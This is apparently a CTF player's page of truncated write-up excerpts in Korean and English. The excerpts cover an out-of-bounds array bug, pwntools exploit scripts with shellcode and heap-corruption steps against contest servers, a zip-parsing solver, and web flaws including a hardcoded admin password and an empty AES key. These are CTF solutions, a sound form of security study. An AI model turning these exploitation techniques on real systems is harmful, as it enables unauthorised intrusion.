imssm99 (Soomin Shin)

2022 Fall Gon Open Qual CTF imssm99 (2nd, 11427 pts) A. Zero Gravity Vulnerability idx를 입력받을 때 값을 검사하지 않아 OOB가 일어나게 된다. a, r을 통해 임의의 주소에 float 형식으로 값을 더하거나 읽을 수 있다. cnt = 1; for ( i = 0; i < cnt; ++i ) { printf("(r)ead / (a)dd >> "); scanf("%2s", &s); if ( (char)s == 'a' ) { printf(" idx >> "); scanf("%d", &idx); printf(" value >> "); scanf("%f", &value); arr[idx] = value + arr[idx]; } else if ( (char)s == 'r' ) { printf(" idx >> "); scanf("%d", &idx); printf("%....

Team ST4RT, 65th Appnote.txt import struct with open("dump.zip", "rb") as f: data = f.read() u16 = lambda x: struct.unpack("<H", x)[0] flag = bytearray() eocd = data[0xEEE2:].split(b"PK\x05\x06") for d in eocd[1:]: offset = u16(d[12:14]) flag.append(data[offset-1]) print(flag) Segfault Labyrinth from pwn import * context.arch = "amd64" #p = process("./challenge") p = remote("segfault-labyrinth.2022.ctfcompetition.com", 1337) p.recvline() p.sendline(b"0"*8) code = """ mov rsp, rdi; mov rbp, rdi; add rsp, 0x400; add rbp, 0x400; mov r8, rdi; TASK: xor rbx, rbx; RUN: mov rdi, 2; mov rsi, [r8 + rbx*8]; mov rdx, 0x1; mov rax, 1; syscall; cmp rax, 0xfffffffffffffff2; jne FOUND; inc rbx; cmp rbx, 0x10; jne RUN; FOUND: mov rax, [rsi]; mov r8, rsi; cmp al, 0; je TASK; mov rdx, 0x40; mov rdi, 1; mov rax, 1; syscall; """ payload = b"" payload += asm(code) p....

Team ST4RT, 5th Notetaker WASM from pwn import * def run(i): p = remote("bin.bcactf.com", 49180) #p = process(["node", "--experimental-wasi-unstable-preview1", "runner.js"]) def note_print(idx): p.sendlineafter(b"4)\n", b"1") p.sendlineafter(b"inclusive)\n", str(idx).encode()) def note_delete(idx): p.sendlineafter(b"4)\n", b"2") p.sendlineafter(b"inclusive)\n", str(idx).encode()) def note_create(idx): p.sendlineafter(b"4)\n", b"3") p.sendlineafter(b"inclusive)\n", str(idx).encode()) def note_write(idx, data): p.sendlineafter(b"4)\n", b"4") p.sendlineafter(b"inclusive)\n", str(idx).encode()) p.sendlineafter(b"\n", data) note_create(1) note_create(2) note_create(3) note_delete(1) # 0x442: %15d -> %lld note_write(1, p32(0x443-0xc) + p32(0x646c6c)) note_delete(2) note_delete(1) calc = lambda fd, bk: ((fd-0x8) << 32) | bk note_write(1, str(calc(0xc00 + 0x4*6, 0x400+0xc*i))....

University Division, imssm99, 3rd (4249 points) CAFE bot.py에 admin의 ID/PW가 있어 admin으로 로그인하면 flag를 볼 수 있다. driver.get('http://3.39.55.38:1929/login') driver.find_element_by_id('id').send_keys('admin') driver.find_element_by_id('pw').send_keys('$MiLEYEN4') driver.find_element_by_id('submit').click() time.sleep(2) superbee func (this *AdminController) AuthKey() { encrypted_auth_key, _ := AesEncrypt([]byte(auth_key), []byte(auth_crypt_key)) this.Ctx.WriteString(hex.EncodeToString(encrypted_auth_key)) } ... auth_crypt_key, _ = web.AppConfig.String("auth_crypt_key") auth_crypt_key가 설정되어있지 않아 빈 문자열이다. ... } else if controllerName == "AdminController" { domain := this.Ctx.Input.Domain() if domain != "localhost" { this.Abort("Not Local") return } } ... func (this *AdminController) AuthKey() { encrypted_auth_key, _ := AesEncrypt([]byte(auth_key), []byte(auth_crypt_key)) this....